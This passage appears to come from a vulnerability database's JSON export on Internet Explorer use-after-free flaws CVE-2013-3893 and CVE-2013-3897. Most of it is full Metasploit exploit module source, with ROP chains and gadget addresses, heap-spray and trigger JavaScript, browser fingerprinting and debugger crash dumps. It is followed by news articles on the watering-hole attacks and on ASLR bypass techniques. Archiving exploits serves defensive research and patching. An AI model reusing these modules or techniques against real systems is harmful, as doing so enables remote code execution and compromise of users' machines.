id_0.onlosecapture=function(e) {\r\n document.write(\"\");\r\n spray();\r\n }\r\n\r\n id_0['outerText']=\"\";\r\n id_0.setCapture();\r\n id_1.setCapture();\r\n}\r\n\r\nfor (i=0; i<20; i++) {\r\n document.createElement(\"frame\");\r\n}\r\n\r\nwindow.onload = function() {\r\n loadOffice();\r\n hit();\r\n}\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n unless is_win7_ie9?(agent)\r\n print_error(\"Not a suitable target: #{agent}\")\r\n send_not_found(cli)\r\n end\r\n\r\n html = ''\r\n if request.uri =~ /\\?dll=(\\w+)$/\r\n rop_dll = ''\r\n if $1 == 'office2007'\r\n print_status(\"Using Office 2007 ROP chain\")\r\n rop_dll = :office2007\r\n elsif $1 == 'office2010'\r\n print_status(\"Using Office 2010 ROP chain\")\r\n rop_dll = :office2010\r\n else\r\n print_error(\"Target does not have Office installed\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = get_exploit_html(cli, request, rop_dll)\r\n else\r\n print_status(\"Checking target requirements...\")\r\n html = get_preq_html(cli, request)\r\n end\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n end\r\n\r\n def exploit\r\n @exploit_page = \"default.html\"\r\n super\r\n end\r\n\r\nend\r\n\r\n=begin\r\n\r\nhxds.dll (Microsoft\u00c2\u00ae Help Data Services Module)\r\n\r\n 2007 DLL info:\r\n ProductVersion: 2.05.50727.198\r\n FileVersion: 2.05.50727.198 (QFE.050727-1900)\r\n\r\n 2010 DLL info:\r\n ProductVersion: 2.05.50727.4039\r\n FileVersion: 2.05.50727.4039 (QFE.050727-4000)\r\n\r\nmshtml.dll\r\n ProductVersion: 9.00.8112.16446\r\n FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)\r\n FileDescription: Microsoft (R) HTML Viewer\r\n\r\n\r\n0:005> r\r\neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34\r\neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nMSHTML!CTreeNode::GetInterface+0xd8:\r\n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????\r\n\r\n\r\n66e13df7 8b0e mov ecx,dword ptr [esi]\r\n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000)\r\n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]\r\n66e13e01 ffd0 call eax\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/28682/"}, {"lastseen": "2016-02-03T09:20:29", "description": "Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080). CVE-2013-3897. Remote exploit for windows platform", "published": "2013-10-15T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer - CDisplayPointer Use-After-Free MS13-080", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3897"], "modified": "2013-10-15T00:00:00", "id": "EDB-ID:28974", "href": "https://www.exploit-db.com/exploits/28974/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"8.0\",\r\n :ua_maxver => \"8.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :rank => NormalRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\r\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\r\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\r\n multiple research companies and the vendor until the October patch release.\r\n\r\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\r\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\r\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\r\n If we use a select() function for the CTextArea element, two important things will happen:\r\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\r\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\r\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\r\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\r\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\r\n object can be forced by using an \"Unslect\" (other approaches also apply), but a reference\r\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\r\n the CDoc::GetLineInfo call, because it is still trying to use that to update\r\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\r\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\r\n possible to achieve arbitrary code execution under the context of the user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3897' ],\r\n [ 'OSVDB', '98207' ],\r\n [ 'MSB', 'MS13-080' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],\r\n [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', {} ],\r\n [ 'IE 8 on Windows 7', {} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'PrependEncoder' => \"\\x81\\xc4\\x0c\\xfe\\xff\\xff\" # add esp, -500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n # Jsunpack first received a sample to analyze on Sep 12 2013.\r\n # MSFT patched this on Oct 8th.\r\n 'DisclosureDate' => \"Oct 08 2013\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def get_check_html\r\n %Q|<html>\r\n<script>\r\n#{js_os_detect}\r\n\r\nfunction os() {\r\n var detect = window.os_detect.getVersion();\r\n var os_string = detect.os_name + \" \" + detect.os_flavor + \" \" + detect.ua_name + \" \" + detect.ua_version;\r\n return os_string;\r\n}\r\n\r\nfunction dll() {\r\n var checka = 0;\r\n var checkb = 0;\r\n try {\r\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\r\n } catch (e) {}\r\n\r\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\r\n try{location.href='ms-help://'} catch(e){}\r\n return \"#{@js_office_2010_str}\";\r\n }\r\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\r\n try{location.href='ms-help://'} catch(e){}\r\n return \"#{@js_office_2007_str}\";\r\n }\r\n return \"#{@js_default_str}\";\r\n}\r\n\r\nwindow.onload = function() {\r\n window.location = \"#{get_resource}/search?o=\" + escape(os()) + \"&d=\" + dll();\r\n}\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def junk\r\n rand_text_alpha(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(target_info)\r\n rop_payload = ''\r\n os = target_info[:os]\r\n dll_used = ''\r\n\r\n case target_info[:dll]\r\n when @js_office_2007_str\r\n dll_used = \"Office 2007\"\r\n\r\n pivot =\r\n [\r\n 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4\r\n junk, # ESI due to POPAD\r\n junk, # EBP due to POPAD\r\n junk,\r\n junk, # EBX due to POPAD\r\n junk, # EDX due to POPAD\r\n junk, # ECX due to POPAD\r\n 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)\r\n 0x51bd81db, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})\r\n\r\n when @js_office_2010_str\r\n dll_used = \"Office 2010\"\r\n\r\n pivot =\r\n [\r\n 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51BE7E9A, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})\r\n\r\n when @js_default_str\r\n if target_info[:os] =~ /windows xp/i\r\n # XP uses msvcrt.dll\r\n dll_used = \"msvcrt\"\r\n\r\n pivot =\r\n [\r\n 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})\r\n else\r\n # Assuming this is Win 7, and we'll use Java 6 ROP\r\n dll_used = \"Java\"\r\n\r\n pivot =\r\n [\r\n 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn\r\n junk # Padding for the POP ECX\r\n ].pack(\"V*\")\r\n\r\n rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})\r\n end\r\n end\r\n\r\n print_status(\"Target uses #{os} with #{dll_used} DLL\")\r\n\r\n rop_payload\r\n end\r\n\r\n def get_sploit_html(target_info)\r\n os = target_info[:os]\r\n js_payload = ''\r\n\r\n if os =~ /Windows (7|XP) MSIE 8\\.0/\r\n js_payload = Rex::Text.to_unescape(get_payload(target_info))\r\n else\r\n print_error(\"Target not supported by this attack.\")\r\n return \"\"\r\n end\r\n\r\n %Q|<html>\r\n<head>\r\n<script>\r\n#{js_property_spray}\r\nsprayHeap({shellcode:unescape(\"#{js_payload}\")});\r\n\r\nvar earth = document;\r\nvar data = \"\";\r\nfor (i=0; i<17; i++) {\r\n if (i==7) { data += unescape(\"%u2020%u2030\"); }\r\n else { data += \"\\\\u4141\\\\u4141\"; }\r\n}\r\ndata += \"\\\\u4141\";\r\n\r\nfunction butterfly() {\r\n for(i=0; i<20; i++) {\r\n var effect = earth.createElement(\"div\");\r\n effect.className = data;\r\n }\r\n}\r\n\r\nfunction kaiju() {\r\n var godzilla = earth.createElement(\"textarea\");\r\n var minilla = earth.createElement(\"pre\");\r\n earth.body.appendChild(godzilla);\r\n earth.body.appendChild(minilla);\r\n godzilla.appendChild(minilla);\r\n\r\n godzilla.onselect=function(e) {\r\n minilla.swapNode(earth.createElement(\"div\"));\r\n }\r\n\r\n var battleStation = false;\r\n var war = new Array();\r\n godzilla.onpropertychange=function(e) {\r\n if (battleStation == true) {\r\n for (i=0; i<50; i++) {\r\n war.push(earth.createElement(\"span\"));\r\n }\r\n }\r\n\r\n earth.execCommand(\"Unselect\");\r\n\r\n if (battleStation == true) {\r\n for (i=0; i < war.length; i++) {\r\n war[i].className = data;\r\n }\r\n }\r\n else {\r\n battleStation = true;\r\n }\r\n }\r\n\r\n butterfly();\r\n godzilla.select();\r\n}\r\n</script>\r\n</head>\r\n<body onload='kaiju()'>\r\n</body>\r\n</html>\r\n |\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n if request.uri =~ /search\\?o=(.+)\\&d=(.+)$/\r\n target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }\r\n sploit = get_sploit_html(target_info)\r\n send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n return\r\n end\r\n\r\n html = get_check_html\r\n print_status(\"Checking out target...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n end\r\n\r\n def exploit\r\n @js_office_2007_str = Rex::Text.rand_text_alpha(4)\r\n @js_office_2010_str = Rex::Text.rand_text_alpha(5)\r\n @js_default_str = Rex::Text.rand_text_alpha(6)\r\n super\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n+hpa this for debugging or you might not see a crash at all :-)\r\n\r\n0:005> r\r\neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c\r\neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????\r\n0:005> u\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx]\r\n6d6dc125 8365e800 and dword ptr [ebp-18h],0\r\n6d6dc129 8d4de8 lea ecx,[ebp-18h]\r\n6d6dc12c 51 push ecx\r\n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)\r\n6d6dc132 53 push ebx\r\n6d6dc133 bf02400080 mov edi,80004002h\r\n6d6dc138 ff10 call dword ptr [eax]\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/28974/"}], "thn": [{"lastseen": "2017-01-08T18:01:15", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893"], "description": "[](<http://2.bp.blogspot.com/-0cBjOV5dm2Y/UkGas9loy-I/AAAAAAAAXrk/36OsgDBdC2s/s1600/Internet+Explorer+zero-day+exploit+used+watering+hole+attacks+to+target+Japanese+users.jpg>)\n\nAttackers exploiting a zero-day vulnerability [CVE-2013-3893](<http://thehackernews.com/2013/09/microsoft-issues-emergency-fix-for_18.html>) in Microsoft\u2019s [Internet Explorer ](<http://thehackernews.com/search/label/Internet%20Explorer>)browser and served them on compromised popular Japanese news websites.\n\n \n\n\nAccording to [FireEye](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html>), at least three major Japanese media websites were compromised in watering hole attacks, dubbed **_Operation DeputyDog_**, appears to target manufacturers, government entities and media organizations in Japan.\n\nThe compromised sites recorded more than 75,000 page views before the exploits were discovered. The [zero-day vulnerability](<http://thehackernews.com/search/label/zero-day>) in IE 8 and 9 allows the stealthy installation of software in the users\u2019 computers which then can be remotely accessed by the hackers.\n\n \n\n\nThe hackers typically use Trojans designed specifically for a pay-to-order attack to steal intellectual property. Researchers saw a payload executable file used against a Japanese target posing as an image file hosted on a Hong Kong server.\n\n \n\n\nThe attack in Japan was discovered two days after Microsoft disclosed the flaw ,\u201c_The exploit was attacking a Use After Free vulnerability in IE\u2019s HTML rendering engine (mshtml.dll) and was implemented entirely in Javascript (no dependencies on Java, Flash etc.), but did depend on a Microsoft Office DLL which was not compiled with ASLR (Address Space Layout Randomization) enabled,_\u201d Microsoft [Security Advisory](<http://technet.microsoft.com/security/advisory/2887505>).\n\n \n\n\nFireEye also claimed the group responsible for DeputyDog is the same one that compromised security firm Bit9 back in February 2013. FireEye did not disclose which sites were infected, but said that Japanese computer security authorities were working with the media outlets to remediate the issue.\n\n \n\n\nMicrosoft released a [FixIt tool](<http://support.microsoft.com/kb/2887505>) and urged IE users to install that as a mitigation until a patch was ready.\n", "modified": "2013-09-24T14:02:21", "published": "2013-09-24T03:02:00", "id": "THN:7772BB7645946AB66D9B3F9358082C11", "href": "http://thehackernews.com/2013/09/internet-explorer-zero-day-exploit-used.html", "type": "thn", "title": "Internet Explorer zero-day exploit used watering hole attacks to target Japanese users", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:15", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893"], "description": "All supported versions of Internet Explorer are vulnerable to a zero-day Exploit that is currently being exploited in targeted attacks against IE 8 and IE 9, dubbed \"_**CVE-2013-3893 MSHTML Shim Workaround**_\".\n\n \n\n\nMicrosoft confirmed that the flaw was unknown before the attacks and that it is already working on an official patch, meantime Microsoft [released](<http://blogs.technet.com/b/msrc/archive/2013/09/16/microsoft-releases-security-advisory-2887505.aspx>) an emergency software fix for Internet Explorer (IE) Web browser.\n\n \n\n\n[](<http://2.bp.blogspot.com/--bEp_S7N2hc/Ujm3iQW0wWI/AAAAAAAAXoI/Ou_XtRoqQjA/s1600/Microsoft+issues+Emergency+Fix+for+Internet+Explorer+zero-day+exploit.jpg>)\n\nAdvisory noted that Microsoft is investigating public reports of a remote code execution vulnerability in Internet Explorer.\n\n \n\n\nThis issue could allow remote code execution if an affected system browses to a website containing malicious content directed towards the specific browser type. Victims could be infected despite the adoption of all necessary countermeasures due the nature of the flaw previously unknown.\n\n \n\n\nThe flaw that has been recently targeted by hackers during attacks is considerable serious and complicated to fix. State-sponsored hacking groups are often willing to pay hundreds of thousands of dollars for zero-day vulnerabilities in widely used software such as Internet Explorer.\n\n \n\n\nIn the specific case if the attacker successfully exploited the zero-day vulnerability could gain the same user rights as the current user, due this reason MS confirmed that whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\n \n\n\nMicrosoft's advisory also says that EMET (the [Enhanced Mitigation Experience Toolkit](<http://technet.microsoft.com/security/jj653751/>)) may be used to mitigate against the vulnerability.\n", "modified": "2013-09-18T14:26:10", "published": "2013-09-18T03:26:00", "id": "THN:D6BA201E74018A71C342FC55FFDD18A0", "href": "http://thehackernews.com/2013/09/microsoft-issues-emergency-fix-for_18.html", "type": "thn", "title": "Microsoft issues Emergency Fix for Internet Explorer zero-day exploit", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:14", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893"], "description": "October is turning out to be a busy month for patches. This month also marks the 10-year anniversary of the [Patch Tuesday](<http://thehackernews.com/search/label/patch%20Tuesday>) program, which Microsoft started in October of 2003. \n \nScheduled for tomorrow, Microsoft has announced that they will release eight security updates including four critical, addressing vulnerabilities in Microsoft Windows, [Internet Explorer ](<http://thehackernews.com/search/label/Internet%20Explorer>)(IE), Microsoft Office and its other products.\n\n \n\n\n[](<http://2.bp.blogspot.com/-Zr-QF-HOlBY/UlK97ZWSeBI/AAAAAAAAX_M/kkoH3ly2wdI/s1600/Microsoft+Patch+Tuesday+-+8+Security+Updates,+4+critical+vulnerabilities,+including+Internet+Explorer+zero-day.jpg>)Bulletin 1 is almost certainly to a [zero-day vulnerability](<http://thehackernews.com/search/label/zero%20day>) [CVE-2013-3893](<http://thehackernews.com/2013/09/internet-explorer-zero-day-exploit-used.html>) that has been actively exploited by hackers in targeted attacks. Though Microsoft issued a temporary \"[Fix it](<http://thehackernews.com/2013/09/microsoft-issues-emergency-fix-for_18.html>)\" in September for the vulnerability,\n\n \n\n\nBulletins 2, 3 and 4 address vulnerabilities in a wide range of Microsoft products, including Windows XP, 7 and 8, and Windows Server 2003, 2008 and 2012. \n \n\n\nBulletins 5, 6 and 7 address vulnerabilities that could allow for [remote code execution](<http://thehackernews.com/search/label/remote%20code%20execution>). Bulletin 8 addresses an information disclosure [vulnerability](<http://thehackernews.com/search/label/Vulnerability>) in SIlverlight and is the least urgent of the eight patches.\n\n \n\n\nMicrosoft's [pre-release](<http://technet.microsoft.com/en-us/security/bulletin/ms13-oct>) notice provides more details of the affected software packages.\n\n \n\n\n[Adobe](<http://thehackernews.com/2013/10/adobe-gets-hacked-hackers-steal-29.html>) will also be releasing [updates on Tuesday](<http://www.adobe.com/support/security/bulletins/apsb13-25.html>) for Reader XI and Acrobat XI for Windows. Both are rated 2, which means it's a critical vulnerability, but not known to be in use.\n\n \n\n\n \n\n", "modified": "2013-10-07T14:32:46", "published": "2013-10-07T02:59:00", "id": "THN:652653D945C00F48ED829424A45D3937", "href": "http://thehackernews.com/2013/10/October-Patch-Tuesday-Internet-Explorer-zero-day.html", "type": "thn", "title": "Microsoft Patch Tuesday - 8 Security Updates, 4 critical vulnerabilities, including Internet Explorer zero-day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:12", "bulletinFamily": "info", "cvelist": ["CVE-2013-5990", "CVE-2013-3893"], "description": "None\n", "modified": "2013-11-15T16:35:46", "published": "2013-11-15T05:35:00", "id": "THN:1A9D68675814428FB1A1DD8C3778BCF1", "href": "http://thehackernews.com/2013/11/Japanese-Ichitaro-zero-day-vulnerability-CVE-2013-5990.html", "type": "thn", "title": "Japanese word processor 'Ichitaro' zero-day attack discovered in the wild", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:14", "bulletinFamily": "info", "cvelist": ["CVE-2012-4969", "CVE-2013-0640", "CVE-2012-4792", "CVE-2013-3893"], "description": "[](<http://2.bp.blogspot.com/-w3LwCzj4YXo/Ul6znjNKKPI/AAAAAAAAYHo/lX4eIOqgbds/s1600/ASLR+bypass+techniques+are+popular+with+APT+attacks.jpg>)\n\n[Address space layout randomization (ASLR)](<http://thehackernews.com/search/label/ASLR>) is a security technique involved in protection from buffer overflow attacks. Many recent [APT (Advanced Persistent Threat)](<http://thehackernews.com/search/label/APT>) attacks have utilized many different ASLR bypass techniques during the past year, according to Researchers at [FireEye](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html>). \n \nMany exploits and malware attacks rely on the ability of the programmer to accurately identify where specific processes or system functions reside in memory. In order for an attacker to exploit or leverage a function, they must first be able to tell their code where to find the function or process to exploit. The [goal of ASLR](<http://thehackernews.com/2012/07/android-security-shielded-with-full.html>) is to introduce randomness into addresses used by a given task. It involves randomly arranging the positions of key data areas of a program, including the base of the executable and the positions of the stack, heap, and libraries, in a process's address space. \n\n \n\n\nToday a lot of attention is brought to client side exploits especially inside [web browsers](<http://thehackernews.com/search/label/web%20browser>). Normally the exploitation is done through the oldest known method of spraying the heap. \n \nAccording to Researchers, the easiest and most popular way to defeat ASLR protection is - loading a non-ASLR module. Such attacks were recently used in [Internet Explorer](<http://thehackernews.com/search/label/Internet%20Explorer>) (IE) Zero-Day Exploit CVE-2013-3893 and some other [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>) i.e. CVE2013-1347, CVE-2012-4969, CVE-2012-4792. \n \nBut there is a limitation that the non-ASLR module technique requires that IE 8 and IE 9 must be running with old software such as JRE 1.6, Office 2007/2010.\n\n \nAnother ASLR bypass technique involves the modification of the BSTR length/null terminator. But this technique only applies to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing/decreasing the content of a memory pointer. The Adobe XFA [0day exploit](<http://thehackernews.com/search/label/zero%20day>) (CVE-2013-0640) uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and [DEP](<http://thehackernews.com/search/label/DEP>). \n \n\"_The good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR such that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it may then use the same memory corruption bug to control EIP._\" \n \nAccording to Microsoft, these types of bugs typically use [JavaScript](<http://thehackernews.com/search/label/JavaScript%20code>) to trigger the flaw, as well as heap-spray to abuse the memory, and bypass ASLR. ASLR bypassing has become more and more common in Zero-Day attacks.\n", "modified": "2013-10-16T15:45:43", "published": "2013-10-16T04:42:00", "id": "THN:7ACF921BA3C582C8760C348FD2475BC2", "href": "http://thehackernews.com/2013/10/aslr-bypass-techniques-are-popular-with.html", "type": "thn", "title": "ASLR bypass techniques are popular with APT attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-11T15:53:22", "edition": 2, "description": "This Metasploit module exploits a use-after-free vulnerability that targets Internet Explorer 9 on Windows 7. The flaw most likely exists in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and passed on to more functions, eventually arriving in function MSHTML!CTreeNode::GetInterface, and causing a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.", "published": "2013-10-02T00:00:00", "type": "zdt", "title": "Microsoft Internet Explorer SetMouseCapture Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-3893"], "modified": "2013-10-02T00:00:00", "id": "1337DAY-ID-21313", "href": "https://0day.today/exploit/description/21313", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Micorosft Internet Explorer SetMouseCapture Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability that currents targets Internet\r\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\r\n It was initially found in the wild in Japan, but other regions such as English,\r\n Chinese, Korean, etc, were targeted as well.\r\n\r\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\r\n reference during an event. An attacker first can setup two elements, where the second\r\n is the child of the first, and then setup a onlosecapture event handler for the parent\r\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\r\n one for the parent element, one for the child. When the setCapture() call for the child\r\n element is called, it finally triggers the event, which allows the attacker to cause an\r\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\r\n memory. The exact size of this memory may differ based on the version of IE. After the\r\n free, an invalid reference will still be kept and pass on to more functions, eventuall\r\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\r\n code execution) when this function attempts to use this reference to call what appears to\r\n be a PrivateQueryInterface due to the offset (0x00).\r\n\r\n To mimic the same exploit found in the wild, this module will try to use the same DLL\r\n from Microsoft Office 2007 or 2010 to leverage the attack.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild first spotted in Japan\r\n 'sinn3r' # Metasploit (thx binjo for the heads up!)\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3893' ],\r\n [ 'OSVDB', '97380' ],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true,\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 17 2013\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def is_win7_ie9?(agent)\r\n (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\\.1/)\r\n end\r\n\r\n def get_preq_html(cli, req)\r\n %Q|\r\n<html>\r\n<script>\r\n function getDLL() {\r\n var checka = 0;\r\n var checkb = 0;\r\n\r\n try {\r\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\r\n } catch (e) {}\r\n\r\n if ((typeof 